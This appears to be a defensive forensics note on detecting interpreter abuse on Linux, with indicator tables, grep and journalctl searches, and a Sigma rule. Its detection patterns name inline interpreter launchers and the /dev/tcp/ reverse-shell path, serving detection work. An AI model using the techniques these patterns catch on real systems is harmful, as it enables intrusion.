This note documents detection patterns related to Interpreter Abuse on Linux systems.
Direct Indicators
| Source | Grep Pattern / Artifact | Meaning | Forensic Value | Notes |
|---|
| Shell history | python -c | Inline code execution | Critical | Very common payload launcher. |
| Shell history | python3 -c | Inline Python execution | Critical | Common reverse shell pattern. |
| Shell history | perl -e | Inline Perl payload | Critical | GTFOBins-style execution. |
| Shell history | ruby -e | Inline Ruby payload | High | Less common but powerful. |
| Shell history | awk 'BEGIN | Inline awk execution | Critical | Strong GTFOBins indicator. |
| Shell history | php -r | Inline PHP execution | Critical | Web/server abuse pattern. |
| Shell history | bash -c | Wrapped inline execution | Critical | Common launcher wrapper. |
| Shell history | sh -c | Minimal inline execution | High | Often nested in payloads. |
| Shell history | /dev/tcp/ | Reverse shell through interpreter | Critical | Strong malicious signal. |
| Shell history | base64 decode piped to interpreter | Obfuscated execution | Critical | Mature operator pattern. |
auditd | interpreter spawn | Process attribution | Critical | Best attribution if enabled. |
| Temp scriptless execution | no file artifact | Critical | Memory-light tradecraft. | |
Indirect Indicators
| Indicator | What To Look For | Forensic Value | Notes |
|---|
| Interpreter use immediately after foothold | Payload stage | Critical | Strong intrusion sequence. |
| Base64 then interpreter | Obfuscated execution | Critical | Mature operator signal. |
| Interpreter under service account | Suspicious context | Critical | Often exploitation shell. |
| Reverse shell via Python/Perl | Active C2 | Critical | Very high severity. |
| No script file but interpreter activity | Fileless execution | Critical | Strong stealth clue. |
Common Tools
| Tool | Usage |
|---|
| Python | Inline payload execution. |
| Perl | GTFOBins execution. |
| Ruby | Inline code. |
| Awk | Lightweight code execution. |
| PHP | Server-side payloads. |
| Bash | Wrapper execution. |
Relevant Artifacts
| Artifact | Path / Command | Forensic Value | Notes |
|---|
| Shell history | .bash_history | Critical | Primary evidence. |
| Audit logs | /var/log/audit/audit.log | Critical | Process attribution. |
| Process tree | ps auxf | Critical | Parent-child linkage. |
| Temp dirs | /tmp, /dev/shm | High | Related staging often nearby. |
MITRE ATT&CK References
- T1059 Command and Scripting Interpreter
- T1059.006 Python
- T1059.004 Unix Shell
Decision Tree
- Which interpreter used?
- Inline code or wrapper?
- Obfuscated?
- Reverse shell or payload?
- Which user context?
Example Detection Templates
Grep
grep -R "python -c\|python3 -c\|perl -e\|ruby -e\|awk 'BEGIN\|php -r\|bash -c\|sh -c\|/dev/tcp/" /home/*/.bash_history /root/.bash_history 2>/dev/null
Journalctl
journalctl | grep -E "python|perl|ruby|php|bash"
File Inspection
ps auxf | grep -E "python|perl|ruby|php"
Sigma
title: Linux Interpreter Abuse
id: linux-interpreter-abuse
status: experimental
description: Detects suspicious inline interpreter execution
logsource:
product: linux
detection:
selection_keywords:
message|contains:
- 'python -c'
- 'perl -e'
- 'php -r'
- '/dev/tcp/'
condition: selection_keywords
level: high
tags:
- attack.execution
- attack.t1059
Mitigation & Hardening
| Control Area | Mitigation | Effectiveness | Notes |
|---|
| Auditd | Track interpreter execution | High | Strong attribution. |
| Restrict interpreters | Remove unused runtimes | High | Shrinks abuse surface. |
| Egress control | Block callback paths | Critical | Reduces shell success. |
